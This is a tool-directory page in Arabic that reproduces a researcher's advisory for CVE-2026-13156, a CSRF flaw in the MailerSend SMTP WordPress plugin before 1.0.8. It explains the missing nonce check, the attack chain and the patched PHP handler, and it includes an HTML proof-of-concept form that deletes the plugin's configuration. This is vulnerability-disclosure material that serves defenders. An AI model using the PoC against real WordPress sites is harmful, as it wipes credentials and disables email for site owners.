Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-13156 — CVE-2026-13156 نشرة استشارية حول ثغرة أمنية وPoC — اكتُشفت بواسطة Huynh Kien Minh (MinhHK). | Kitploit
أدوات/GitHubGitHub/minhhk68/cve-2026-13156
أدوات التصيدتحليل الثغرات الأمنيةالاستغلالأمن الويبالأوراق والأبحاثالتعلم والتعليم
GitHubminhhk68/cve-2026-13156

CVE-2026-13156

CVE-2026-13156 نشرة استشارية حول ثغرة أمنية وPoC — اكتُشفت بواسطة Huynh Kien Minh (MinhHK).

عرض المستودع
منذ 19 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-13156 — MailerSend Official SMTP Integration < 1.0.8 حذف الإعدادات وإلغاء تنشيط الإضافة عبر CSRF

CVE-2026-13156 Researcher: Huynh Kien Minh Proton Hall of Fame WPScan Assigner

مخطط سلسلة هجوم CSRF لـ CVE-2026-13156


📌 الملخص وروابط سريعة

[!IMPORTANT] الملخص: تم اكتشاف ثغرة تزوير طلبات عبر المواقع (CSRF) عالية الخطورة (CVE-2026-13156) في إضافة MailerSend SMTP Integration الرسمية لووردبريس (< 1.0.8). يتحقق معالج حذف الإعدادات mailersend_handle_configuration_delete() من صلاحيات الإدارة (manage_options) لكنه يهمل تمامًا التحقق من Nonce الخاص بووردبريس (check_admin_referer()). يمكن للمهاجم إنشاء طلب ضار عبر المواقع يستهدف مسؤول ووردبريس مصادقًا عليه لمسح بيانات اعتماد SMTP المخزنة وإجبار الإضافة على إلغاء التنشيط بصمت، مما يؤدي إلى حرمان كامل من الخدمة عبر جميع سير عمل البريد الإلكتروني.

👉 اقرأ التحليل الفني المتعمق الكامل على Medium: مقالة تحليل متعمق: CVE-2026-13156 أو استكشف محفظتي الأمنية: https://minhhk.web.app/


📋 الملخص التنفيذي ونظرة عامة على الثغرة

  • معرّف الثغرة: CVE-2026-13156 (معرّف WPScan: 595e653d-0904-43cf-8e61-d684599de11b)
  • البرنامج المتأثر: MailerSend – Official SMTP Integration (إضافة ووردبريس)
  • الإصدارات المتأثرة: قبل الإصدار 1.0.8 (< 1.0.8)
  • نوع الثغرة: تزوير طلبات عبر المواقع (CSRF يؤدي إلى حذف الإعدادات وإلغاء تنشيط الإضافة) — CWE-352
  • الباحث الرئيسي والمبلّغ: Huynh Kien Minh (الملقب: MinhHK)
  • الدور والانتماء: طالب أمن معلومات، وصائد ثغرات (Bug Bounty Hunter)، وباحث في الأمن الهجومي.

عن الباحث:
Huynh Kien Minh (Huỳnh Kiến Minh) هو باحث استباقي في الأمن السيبراني ومحلل ثغرات، معروف بتقييماته الأمنية المتعمقة والإفصاح المسؤول، بما في ذلك التحليلات الفنية لثغرة CVE-2026-13156. كما تم تكريمه رسميًا في قاعة مشاهير Proton الأمنية لاكتشافه والإبلاغ عن ثغرات أمنية حرجة.


🌐 المركز الرسمي للتحقق والمراجع

للتحقق من هذا التقرير الفني، أو استكشاف تحليلات إثبات المفهوم، أو التواصل مع الباحث، تفضل بزيارة:

  • 🏠 المحفظة الرسمية: مركز محفظة Huynh Kien Minh الأمنية
  • 💼 ملف LinkedIn: تواصل مع Huynh Kien Minh على LinkedIn
  • 📝 الورقة البيضاء الرسمية على Medium: مقالة تحليل متعمق: CVE-2026-13156 على Medium
  • 👨‍💻 ملف GitHub: ملف MinhHK68 على GitHub
  • 🔗 نشرة WPScan: إدخال WPScan لـ CVE-2026-13156
  • 🔗 تقرير BaseFortify: تحليل BaseFortify لـ CVE-2026-13156

🔍 التحليل الفني المتعمق وتحليل السبب الجذري

1. تحليل السبب الجذري (غياب التحقق من Nonce)

تقوم إضافة MailerSend Official SMTP Integration لووردبريس (قبل الإصدار 1.0.8) بتسجيل إجراء إداري (configuration-delete) يهدف إلى مسح رموز API المخزنة ومسح خيارات تكوين SMTP (wp_options) وإلغاء تنشيط الإضافة عند تشغيله من لوحة الإدارة.

على الرغم من أن نقطة النهاية تتحقق مما إذا كان المستخدم النشط يمتلك صلاحية manage_options (لضمان أن الطلب صادر من جلسة مسؤول)، إلا أنها تفشل في إجراء التحقق من Nonce الخاص بووردبريس (check_admin_referer() أو wp_verify_nonce()).

وبما أن طلبات HTTP التي تفتقر إلى التحقق من Nonce لا يمكنها التمييز بين نقرات المسؤول المقصودة والطلبات المزورة عبر المواقع، فإن أي موقع خارجي يفتحه مسؤول مصادق عليه يمكنه تشغيل إجراء configuration-delete بصمت.

2. دورة حياة الهجوم والتأثير

  1. تحديد الهدف: يحدد المهاجم موقع ووردبريس مستهدفًا يستخدم MailerSend SMTP (< 1.0.8).
  2. تسليم الحمولة: ينشئ المهاجم صفحة ويب خبيثة بلغة HTML/JavaScript تحتوي على نموذج يرسل نفسه تلقائيًا إلى نقطة النهاية الإدارية (/wp-admin/admin-post.php أو /wp-admin/admin.php?page=mailersend&action=configuration-delete).
  3. التشغيل: يزور مسؤول ووردبريس مسجل الدخول صفحة الويب الخاصة بالمهاجم (مثلًا عبر التصيد الاحتيالي، أو رابط في منتدى، أو XSS على موقع خارجي).
  4. التنفيذ وحرمان الخدمة: يرسل المتصفح الطلب المزور مع ملفات تعريف الارتباط الخاصة بجلسة المسؤول النشطة. تقوم إضافة MailerSend بتنفيذ معالج الحذف:
    • يتم مسح جميع إعدادات MailerSend SMTP وبيانات اعتماد API المخزنة من قاعدة البيانات.
    • يتم إلغاء تنشيط إضافة MailerSend تلقائيًا.
    • التأثير الحرج: يفقد الموقع المستهدف فورًا جميع قدرات إرسال البريد الإلكتروني (تفشل إعادة تعيين كلمات المرور، وإشعارات الطلبات، وتنبيهات الأمان دون سابق إنذار).

💻 كود إثبات المفهوم (PoC) الاستغلالي

[!WARNING] إخلاء مسؤولية أخلاقي: يتم توفير حمولة إثبات المفهوم التالية لتزوير طلبات عبر المواقع (CSRF) بلغة HTML لأغراض تعليمية بحتة، والتحقق الدفاعي، وتدقيق الأمان وفق بروتوكولات الإفصاح الأخلاقي بواسطة Huynh Kien Minh. لا تقم بتنفيذها ضد أهداف غير مصرح بها.

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
    <!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
    <h2>CVE-2026-13156 — CSRF Verification PoC</h2>
    <p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
    
    <!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
    <form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
        <input type="hidden" name="page" value="mailersend-smtp" />
        <input type="hidden" name="action" value="configuration-delete" />
        <!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
        <input type="submit" value="Execute PoC (Simulate Attack)" />
    </form>

    <script>
        // Automatically submit the forged request when the administrator loads the page
        document.addEventListener("DOMContentLoaded", function() {
            console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
            // Uncomment line below to enable auto-execution in lab environments:
            // document.getElementById('csrfPoC').submit();
        });
    </script>
</body>
</html>

🛡️ المعالجة وتحليل التصحيح

لمسؤولي الأنظمة وأصحاب المواقع

  • الترقية الفورية: قم بتحديث إضافة MailerSend – Official SMTP Integration فورًا إلى الإصدار 1.0.8 أو أعلى.
  • نظافة الجلسة: قم دائمًا بتسجيل الخروج من حسابات ووردبريس الإدارية عند تصفح صفحات ويب خارجية غير موثوقة، أو استخدم ملفات تعريف متصفح منفصلة ومعزولة (أو حاويات) لإدارة الموقع.

للمطورين (كيف يعمل التصحيح)

لتأمين الإجراءات الإدارية التي تغيّر الحالة في إضافات ووردبريس بشكل صحيح، يجب على المطورين فرض تحقق صارم من Nonce قبل معالجة الطلبات:

root@kitploit:~
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
    // 1. Check User Capability
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
    }

    // 2. REQUIRED: Verify CSRF Nonce Token
    if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
        wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
    }

    // 3. Proceed safely with configuration deletion
    delete_option( 'mailersend_smtp_settings' );
    deactivate_plugins( plugin_basename( __FILE__ ) );
    
    wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
    exit;
}

🏆 التكريم الأمني ذو الصلة

  • 🏆 التكريم في قاعة مشاهير Proton: تم تكريمه لاكتشافه والإبلاغ عن ثغرات حرجة في البنية التحتية لـ Proton.
  • 🏠 المحفظة الرسمية: استكشف المزيد من أبحاث الأمن الهجومي وأدوات الأمان مفتوحة المصدر والمنشورات بواسطة Huynh Kien Minh.

⚖️ الترخيص وحقوق النشر

تتم صيانة هذا المستودع والتقرير الفني ونشرهما بواسطة Huynh Kien Minh (MinhHK) وفق إرشادات الإفصاح المسؤول لتعزيز نظام بيئي عالمي أكثر أمانًا لووردبريس والأمن السيبراني.

تنزيل الأداة